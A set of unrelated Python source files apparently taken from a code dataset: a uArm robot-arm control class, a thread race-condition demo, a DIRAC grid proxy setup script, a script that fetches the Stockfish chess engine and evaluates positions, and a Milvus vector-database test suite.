:param data_type: EEPROM_DATA_TYPE_FLOAT, EEPROM_DATA_TYPE_INTEGER, EEPROM_DATA_TYPE_BYTE
:return:
"""
try:
cmd = protocol.GET_EEPROM.format(address, data_type)
serial_id, response = self.send_and_receive(cmd)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
if data_type == protocol.EEPROM_DATA_TYPE_FLOAT:
return float(response[1][1:])
elif data_type == protocol.EEPROM_DATA_TYPE_INTEGER:
return int(response[1][1:])
elif data_type == protocol.EEPROM_DATA_TYPE_BYTE:
return int(response[1][1:])
except Exception as e:
printf("Error {}".format(e))
return None
# -------------------------------------------------------- Set Commands -----------------------------------------------#
@catch_exception
def set_position(self, x=None, y=None, z=None, speed=300, relative=False, wait=False):
"""
Move uArm to the position (x,y,z) unit is mm, speed unit is mm/sec
:param x:
:param y:
:param z:
:param speed:
:param relative
:param wait: if True, will block the thread, until get response or timeout
:return:
"""
if relative:
if x is None:
x = 0.0
if y is None:
y = 0.0
if z is None:
z = 0.0
x = str(round(x, 2))
y = str(round(y, 2))
z = str(round(z, 2))
s = str(round(speed, 2))
command = protocol.SET_POSITION_RELATIVE.format(x, y, z, s)
else:
if x is None or y is None or z is None:
raise Exception('x, y, z can not be None in absolute mode')
x = str(round(x, 2))
y = str(round(y, 2))
z = str(round(z, 2))
s = str(round(speed, 2))
command = protocol.SET_POSITION.format(x, y, z, s)
if wait:
serial_id, response = self.send_and_receive(command)
while self.get_is_moving():
time.sleep(0.05)
if response is not None:
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
@catch_exception
def set_pump(self, on, wait=False):
"""
Control uArm Pump On or OFF
:param on: True On, False OFF
:param wait: if True, will block the thread, until get response or timeout
:return: succeed True or Failed False
"""
command = protocol.SET_PUMP.format(1 if on else 0)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
@catch_exception
def set_gripper(self, catch, wait=False):
"""
Turn On/Off Gripper
:param catch: True On/ False Off
:param wait: if True, will block the thread, until get response or timeout
:return:
"""
command = protocol.SET_GRIPPER.format(1 if catch else 0)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
@catch_exception
def set_wrist(self, angle, wait=False):
"""
Set uArm Hand Wrist Angle. Include servo offset.
:param angle:
:param wait: if True, will block the thread, until get response or timeout
:return:
"""
return self.set_servo_angle(protocol.SERVO_HAND, angle, wait=wait)
@catch_exception
def set_servo_angle(self, servo_number, angle, wait=False):
"""
Set uArm Servo Angle, 0 - 180 degrees, this Function will include the manual servo offset.
:param servo_number: lease reference protocol.py SERVO_BOTTOM, SERVO_LEFT, SERVO_RIGHT, SERVO_HAND
:param angle: 0 - 180 degrees
:param wait: if True, will block the thread, until get response or timeout
:return: succeed True or Failed False
"""
command = protocol.SET_SERVO_ANGLE.format(str(servo_number), str(angle))
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
@catch_exception
def set_buzzer(self, frequency, duration, wait=False):
"""
Turn on the uArm Buzzer
:param frequency: The frequency, in Hz
:param duration: The duration of the buzz, in seconds
:param wait: if True, will block the thread, until get response or timeout
:return:
"""
command = protocol.SET_BUZZER.format(frequency, duration)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
@catch_exception
def set_servo_attach(self, servo_number=None, move=True, wait=False):
"""
Set Servo status attach, Servo Attach will lock the servo, You can't move uArm with your hands.
:param servo_number: If None, will attach all servos, please reference protocol.py SERVO_BOTTOM, SERVO_LEFT,
SERVO_RIGHT, SERVO_HAND
:param move: if True, will move to current position immediately
:param wait: if True, will block the thread, until get response or timeout
:return: succeed True or Failed False
"""
if servo_number is not None:
if move:
pos = self.get_position()
self.set_position(pos[0], pos[1], pos[2], speed=100)
command = protocol.ATTACH_SERVO.format(servo_number)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0].startswith(protocol.OK):
return True
else:
return False
else:
self.send_msg(command)
else:
if move:
pos = self.get_position()
self.set_position(pos[0], pos[1], pos[2], speed=0)
if wait:
if self.set_servo_attach(servo_number=0, move=False, wait=True) \
and self.set_servo_attach(servo_number=1, move=False, wait=True) \
and self.set_servo_attach(servo_number=2, move=False, wait=True) \
and self.set_servo_attach(servo_number=3, move=False, wait=True):
return True
else:
return False
else:
self.set_servo_attach(servo_number=0, move=False)
self.set_servo_attach(servo_number=1, move=False)
self.set_servo_attach(servo_number=2, move=False)
self.set_servo_attach(servo_number=3, move=False)
@catch_exception
def set_servo_detach(self, servo_number=None, wait=False):
"""
Set Servo status detach, Servo Detach will unlock the servo, You can move uArm with your hands.
But move function won't be effect until you attach.
:param servo_number: If None, will detach all servos, please reference protocol.py SERVO_BOTTOM, SERVO_LEFT, SERVO_RIGHT, SERVO_HAND
:param wait: if True, will block the thread, until get response or timeout
:return: succeed True or Failed False
"""
if servo_number is not None:
command = protocol.DETACH_SERVO.format(servo_number)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0].startswith(protocol.OK):
return True
else:
return False
else:
self.send_msg(command)
else:
if wait:
if self.set_servo_detach(servo_number=0, wait=True) \
and self.set_servo_detach(servo_number=1, wait=True) \
and self.set_servo_detach(servo_number=2, wait=True) \
and self.set_servo_detach(servo_number=3, wait=True):
return True
else:
return False
else:
self.set_servo_detach(servo_number=0)
self.set_servo_detach(servo_number=1)
self.set_servo_detach(servo_number=2)
self.set_servo_detach(servo_number=3)
@catch_exception
def set_polar_coordinate(self, rotation, stretch, height, speed=100, wait=False):
"""
Polar Coordinate, rotation, stretch, height.
:param rotation:
:param stretch:
:param height:
:param speed:
:param wait: if True, will block the thread, until get response or timeout
:return:
"""
rotation = str(round(rotation, 2))
stretch = str(round(stretch, 2))
height = str(round(height, 2))
speed = str(round(speed, 2))
command = protocol.SET_POLAR.format(stretch, rotation, height, speed)
if wait:
self.send_msg(command)
while self.get_is_moving():
time.sleep(0.05)
# if wait:
# serial_id, response = self.send_and_receive(command)
# if response is None:
# printf("No Message response {}".format(serial_id))
# return None
# if response[0].startswith(protocol.OK):
# return True
# else:
# return False
else:
self.send_msg(command)
# ---------------------------------------------------- Report Commands -----------------------------------------------#
@catch_exception
def set_report_position(self, interval, wait=False):
"""
Report Current Position in (interval) seconds.
:param interval: Seconds if 0 disable report
:param wait: if True, will block the thread, until get response or timeout
:return
"""
interval = str(round(interval, 2))
command = protocol.SET_REPORT_POSITION.format(interval)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
@catch_exception
def close_report_position(self, wait=False):
"""
Stop Reporting the position
:return:
"""
self.set_report_position(0, wait=wait)
@catch_exception
def get_report_position(self):
"""
If call `set_report_position`, uArm will report current position during the interval.
Store the position in LIFO queue.
:return: position array [x,y,z,r]
"""
item = self.__position_queue.get(self.timeout)
self.__position_queue.task_done()
return item
def __del__(self):
self.close()
if __name__ == '__main__':
uarm = UArm()
uarm.connect()
printf(uarm.firmware_version())
uarm.set_position(10, 150, 250, speed=100)
uarm.set_position(10, 100, 250, speed=100)
uarm.set_position(10, 200, 250, speed=100)
uarm.set_position(10, 150, 200, speed=100)
uarm.set_position(10, 150, 150, speed=100)
uarm.set_position(10, 150, 100, speed=100)
uarm.set_position(0, 150, 150, speed=100, wait=True)
uarm.set_position(0, 150, 50, speed=100, wait=True)
uarm.set_pump(True)
uarm.set_position(0, 100, 0, speed=100, relative=True, wait=True)
uarm.set_position(0, 0, 100, speed=100, relative=True, wait=True)
uarm.set_buzzer(1000, 0.1)
uarm.set_position(0, -100, 0, speed=100, relative=True, wait=True)
uarm.set_position(0, 0, -100, speed=100, relative=True, wait=True)
uarm.set_pump(False)
uarm.set_position(-100, 0, 0, speed=100, relative=True, wait=True)
uarm.set_position(100, 0, 0, speed=100, relative=True, wait=True)
# uarm.set_polar_coordinate(133,26)
# threading.Thread(target=lambda :uarm.set_servo_attach()).start()
# threading.Thread(target=lambda :uarm.set_servo_attach()).start()
uarm.set_position(0, 0, 100, relative=True, speed=100, wait=True)
uarm.set_position(0, 100, 0, relative=True, speed=100, wait=True)
uarm.set_position(0, 0, -100, relative=True, speed=100, wait=True)
|
Thread_Race_Condition.py | # Thread Race Condition
from threading import Thread, current_thread
class Flight:
def __init__(self, available_seat):
self.available_seat = available_seat
def reserve(self, need_seat):
print("Available Seats : ", self.available_seat)
if(self.available_seat >= need_seat):
name = current_thread().name
print(f'{need_seat} seat is allocated for {name}')
self.available_seat -= need_seat
else:
print("Sorry! All seats has allocated")
f = Flight(1)
t1 = Thread(target=f.reserve, args=(1,), name="Rahul")
t2 = Thread(target=f.reserve, args=(1,), name="Sonam")
t1.start()
t2.start() |
dirac-notebook-proxy-init.py | #!/usr/bin/env python
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import glob
import time
import threading
import DIRAC
from DIRAC import gConfig, gLogger, S_OK, S_ERROR
from DIRAC.Core.Base import Script
from DIRAC.Core.Security import ProxyInfo # pylint: disable=import-error
from DIRAC.FrameworkSystem.Client import ProxyGeneration
from DIRAC.FrameworkSystem.Client.BundleDeliveryClient import BundleDeliveryClient
from DIRAC.FrameworkSystem.private.testNotebookAuth import notebookAuth
__RCSID__ = "$Id$"
class Params(ProxyGeneration.CLIParams):
addVOMSExt = False
def setVOMSExt(self, _arg):
""" Set VOMS extention
:param _arg: unuse
:return: S_OK()
"""
self.addVOMSExt = True
return S_OK()
def registerCLISwitches(self):
""" Register CLI switches """
ProxyGeneration.CLIParams.registerCLISwitches(self)
Script.registerSwitch("M", "VOMS", "Add voms extension", self.setVOMSExt)
class ProxyInit(object):
def __init__(self, piParams):
""" Constructor """
self.__piParams = piParams
self.__issuerCert = False
self.__proxyGenerated = False
self.__uploadedInfo = {}
def printInfo(self):
""" Printing utilities
"""
resultProxyInfoAsAString = ProxyInfo.getProxyInfoAsString(self.__proxyGenerated)
if not resultProxyInfoAsAString['OK']:
gLogger.error('Failed to get the new proxy info: %s' % resultProxyInfoAsAString['Message'])
else:
gLogger.notice("Proxy generated:")
gLogger.notice(resultProxyInfoAsAString['Value'])
if self.__uploadedInfo:
gLogger.notice("\nProxies uploaded:")
maxDNLen = 0
maxProviderLen = len('ProxyProvider')
for userDN, data in self.__uploadedInfo.items():
maxDNLen = max(maxDNLen, len(userDN))
maxProviderLen = max(maxProviderLen, len(data['provider']))
gLogger.notice(" %s | %s | %s | SupportedGroups" % ("DN".ljust(maxDNLen), "ProxyProvider".ljust(maxProviderLen),
"Until (GMT)".ljust(16)))
for userDN, data in self.__uploadedInfo.items():
gLogger.notice(" %s | %s | %s | " % (userDN.ljust(maxDNLen), data['provider'].ljust(maxProviderLen),
data['expirationtime'].strftime("%Y/%m/%d %H:%M").ljust(16)),
",".join(data['groups']))
def checkCAs(self):
""" Check CAs
:return: S_OK()
"""
if "X509_CERT_DIR" not in os.environ:
gLogger.warn("X509_CERT_DIR is unset. Abort check of CAs")
return
caDir = os.environ["X509_CERT_DIR"]
# In globus standards .r0 files are CRLs. They have the same names of the CAs but diffent file extension
searchExp = os.path.join(caDir, "*.r0")
crlList = glob.glob(searchExp)
if not crlList:
gLogger.warn("No CRL files found for %s. Abort check of CAs" % searchExp)
return
newestFPath = max(crlList, key=os.path.getmtime)
newestFTime = os.path.getmtime(newestFPath)
if newestFTime > (time.time() - (2 * 24 * 3600)):
# At least one of the files has been updated in the last 2 days
return S_OK()
if not os.access(caDir, os.W_OK):
gLogger.error("Your CRLs appear to be outdated, but you have no access to update them.")
# Try to continue anyway...
return S_OK()
# Update the CAs & CRLs
gLogger.notice("Your CRLs appear to be outdated; attempting to update them...")
bdc = BundleDeliveryClient()
res = bdc.syncCAs()
if not res['OK']:
gLogger.error("Failed to update CAs", res['Message'])
res = bdc.syncCRLs()
if not res['OK']:
gLogger.error("Failed to update CRLs", res['Message'])
# Continue even if the update failed...
return S_OK()
def doOAuthMagic(self):
""" Magic method
:return: S_OK()/S_ERROR()
"""
nAuth = notebookAuth(self.__piParams.diracGroup, voms=self.__piParams.addVOMSExt, proxyPath=self.__piParams.proxyLoc)
result = nAuth.getToken()
if not result['OK']:
return result
aToken = result['Value'].get('access_token')
if not aToken:
return S_ERROR('Access token is absent in resporse.')
result = nAuth.getProxyWithToken(aToken)
if not result['OK']:
return result
result = Script.enableCS()
if not result['OK']:
return S_ERROR("Cannot contact CS to get user list")
threading.Thread(target=self.checkCAs).start()
gConfig.forceRefresh(fromMaster=True)
return S_OK(self.__piParams.proxyLoc)
if __name__ == "__main__":
piParams = Params()
piParams.registerCLISwitches()
Script.disableCS()
Script.parseCommandLine(ignoreErrors=True)
DIRAC.gConfig.setOptionValue("/DIRAC/Security/UseServerCertificate", "False")
pI = ProxyInit(piParams)
gLogger.info(gConfig.getConfigurationTree())
resultDoMagic = pI.doOAuthMagic()
if not resultDoMagic['OK']:
gLogger.fatal(resultDoMagic['Message'])
sys.exit(1)
pI.printInfo()
sys.exit(0)
|
auto.py | import os
import smtplib
import stat
import sys
import zipfile
from email.message import EmailMessage
from multiprocessing import Process
from pathlib import Path
from subprocess import call, check_output
from typing import *
import evalfen
from getFile import createDir, downloadName, getAvailableNames
from send import sendFile, sendNotification
STOCKFISH_DOWNLOAD = {
"win32": "https://stockfishchess.org/files/stockfish-11-win.zip",
"linux": "https://stockfishchess.org/files/stockfish-11-linux.zip",
"linux32": "https://stockfishchess.org/files/stockfish-11-linux.zip",
"darwin": "https://stockfishchess.org/files/stockfish-11-mac.zip"
}
STOCKFISH_LOCATION = {
"win32": r"stockfish\stockfish-11-win\Windows\stockfish_20011801_x64_bmi2.exe",
"linux": "stockfish/stockfish-11-linux/Linux/stockfish_20011801_x64_bmi2",
"linux32": "stockfish/stockfish-11-linux/Linux/stockfish_20011801_x64_bmi2",
"darwin": "stockfish/stockfish-11-mac/Mac/stockfish-11-"
}
def promptName() -> str:
return input("What is your name or github username? ")
def unzip(filepath: str, resultpath: str) -> None:
with zipfile.ZipFile(filepath, 'r') as zip_ref:
zip_ref.extractall(resultpath)
def promptNames(names: List[str]) -> str:
for i, name in enumerate(names):
print(i, name, sep='\t')
uin = int(input("Which number? "))
return names[uin]
def promptDownload() -> bool:
uin = input("Do you need to download any other dataset?(y)es/(n)o ")
return 'y' in uin
def downloadStockfish() -> None:
link = STOCKFISH_DOWNLOAD[sys.platform]
call(["curl", "-o", "stockfish.zip", link])
unzip("stockfish.zip", "stockfish/")
stockfishexecutable = str(findStockfish())
if sys.platform != "win32":
os.chmod(stockfishexecutable, stat.S_IEXEC)
os.remove("stockfish.zip")
def promptNameChoice() -> Tuple[str]:
available = os.listdir("data")
for i, name in enumerate(available):
print(i, name, sep='\t')
uin = input("Which would you like to start on? ")
try:
uin = available[int(uin)]
except ValueError:
pass
return str(Path(os.getcwd()) / "data" / uin), uin
def findStockfish() -> Path:
toadd = "bmi2"
if sys.platform == "darwin" and \
'-3' in check_output(["/usr/sbin/sysctl", "-n", "machdep.cpu.brand_string"]).decode():
toadd = "modern"
return Path(os.getcwd()) / (STOCKFISH_LOCATION[sys.platform] + toadd)
def promptStockfish() -> Path:
needsfish = "stockfish" not in os.listdir()
if needsfish:
print("Downloading stockfish")
downloadStockfish()
return findStockfish()
def getNumberThreads() -> int:
return os.cpu_count()
def progressBar(percentage: float) -> str:
numpound = round(percentage*10)
numdash = 10-numpound
return '[' + numpound*'#' + numdash*'-' + ']\t' + "%.2f" % (percentage*100) + "%"
def countOutput(count: int, length: int) -> None:
print(progressBar(count/length), end='\r', flush=True)
def promptThreads() -> int:
numthreads = getNumberThreads()
userthreads = 0
print(f"You have {numthreads} threads available.")
while not 1 <= userthreads <= numthreads:
try:
userthreads = int(input("How many threads would you like to use? "))
except ValueError:
pass
return userthreads
def main() -> None:
createDir("dest")
createDir("data")
if promptDownload():
names = list(getAvailableNames())
names.sort()
name = promptNames(names)
downloadName(name)
sendNotification(promptName(), name)
pathToStockfish = str(promptStockfish())
threads = promptThreads()
source, name = promptNameChoice()
dest = str(Path(os.getcwd()) / "dest" / name)
amountlines = evalfen.lineCount(dest)
finallines = evalfen.lineCount(source)
countOut = lambda c: countOutput(c, finallines)
evalargs = (source, dest, 22, threads, amountlines, pathToStockfish, countOut)
evaluate = Process(target=evalfen.main, args=evalargs)
evaluate.start()
print("Control c to quit")
try:
evaluate.join()
print(dest)
sendFile(promptName(), dest)
except KeyboardInterrupt:
evaluate.terminate()
print("Done for now")
if __name__ == "__main__":
main()
|
test_mix.py | import pdb
import copy
import pytest
import threading
import datetime
import logging
from time import sleep
from multiprocessing import Process
import sklearn.preprocessing
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
table_id = "test_mix"
add_interval_time = 2
vectors = gen_vectors(10000, dim)
vectors = sklearn.preprocessing.normalize(vectors, axis=1, norm='l2')
vectors = vectors.tolist()
top_k = 1
nprobe = 1
epsilon = 0.001
index_params = {'index_type': IndexType.IVFLAT, 'nlist': 16384}
class TestMixBase:
# disable
def _test_search_during_createIndex(self, args):
loops = 10000
table = gen_unique_str()
query_vecs = [vectors[0], vectors[1]]
uri = "tcp://%s:%s" % (args["ip"], args["port"])
id_0 = 0; id_1 = 0
milvus_instance = get_milvus(args["handler"])
milvus_instance.connect(uri=uri)
milvus_instance.create_table({'table_name': table,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2})
for i in range(10):
status, ids = milvus_instance.add_vectors(table, vectors)
# logging.getLogger().info(ids)
if i == 0:
id_0 = ids[0]; id_1 = ids[1]
def create_index(milvus_instance):
logging.getLogger().info("In create index")
status = milvus_instance.create_index(table, index_params)
logging.getLogger().info(status)
status, result = milvus_instance.describe_index(table)
logging.getLogger().info(result)
def add_vectors(milvus_instance):
logging.getLogger().info("In add vectors")
status, ids = milvus_instance.add_vectors(table, vectors)
logging.getLogger().info(status)
def search(milvus_instance):
logging.getLogger().info("In search vectors")
for i in range(loops):
status, result = milvus_instance.search_vectors(table, top_k, nprobe, query_vecs)
logging.getLogger().info(status)
assert result[0][0].id == id_0
assert result[1][0].id == id_1
milvus_instance = get_milvus(args["handler"])
milvus_instance.connect(uri=uri)
p_search = Process(target=search, args=(milvus_instance, ))
p_search.start()
milvus_instance = get_milvus(args["handler"])
milvus_instance.connect(uri=uri)
p_create = Process(target=add_vectors, args=(milvus_instance, ))
p_create.start()
p_create.join()
@pytest.mark.level(2)
def test_mix_multi_tables(self, connect):
'''
target: test functions with multiple tables of different metric_types and index_types
method: create 60 tables which 30 are L2 and the other are IP, add vectors into them
and test describe index and search
expected: status ok
'''
nq = 10000
nlist= 16384
table_list = []
idx = []
#create table and add vectors
for i in range(30):
table_name = gen_unique_str('test_mix_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_table(param)
status, ids = connect.add_vectors(table_name=table_name, records=vectors)
idx.append(ids[0])
idx.append(ids[10])
idx.append(ids[20])
assert status.OK()
for i in range(30):
table_name = gen_unique_str('test_mix_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_table(param)
status, ids = connect.add_vectors(table_name=table_name, records=vectors)
idx.append(ids[0])
idx.append(ids[10])
idx.append(ids[20])
assert status.OK()
time.sleep(2)
#create index
for i in range(10):
index_params = {'index_type': IndexType.FLAT, 'nlist': nlist}
status = connect.create_index(table_list[i], index_params)
assert status.OK()
status = connect.create_index(table_list[30 + i], index_params)
assert status.OK()
index_params = {'index_type': IndexType.IVFLAT, 'nlist': nlist}
status = connect.create_index(table_list[10 + i], index_params)
assert status.OK()
status = connect.create_index(table_list[40 + i], index_params)
assert status.OK()
index_params = {'index_type': IndexType.IVF_SQ8, 'nlist': nlist}
status = connect.create_index(table_list[20 + i], index_params)
assert status.OK()
status = connect.create_index(table_list[50 + i], index_params)
assert status.OK()
#describe index
for i in range(10):
status, result = connect.describe_index(table_list[i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[i]
assert result._index_type == IndexType.FLAT
status, result = connect.describe_index(table_list[10 + i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[10 + i]
assert result._index_type == IndexType.IVFLAT
status, result = connect.describe_index(table_list[20 + i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[20 + i]
assert result._index_type == IndexType.IVF_SQ8
status, result = connect.describe_index(table_list[30 + i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[30 + i]
assert result._index_type == IndexType.FLAT
status, result = connect.describe_index(table_list[40 + i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[40 + i]
assert result._index_type == IndexType.IVFLAT
status, result = connect.describe_index(table_list[50 + i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[50 + i]
assert result._index_type == IndexType.IVF_SQ8
#search
query_vecs = [vectors[0], vectors[10], vectors[20]]
for i in range(60):
table = table_list[i]
status, result = connect.search_vectors(table, top_k, nprobe, query_vecs)
assert status.OK()
assert len(result) == len(query_vecs)
for j in range(len(query_vecs)):
assert len(result[j]) == top_k
for j in range(len(query_vecs)):
assert check_result(result[j], idx[3 * i + j])
def check_result(result, id):
if len(result) >= 5:
return id in [result[0].id, result[1].id, result[2].id, result[3].id, result[4].id]
else:
return id in (i.id for i in result)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.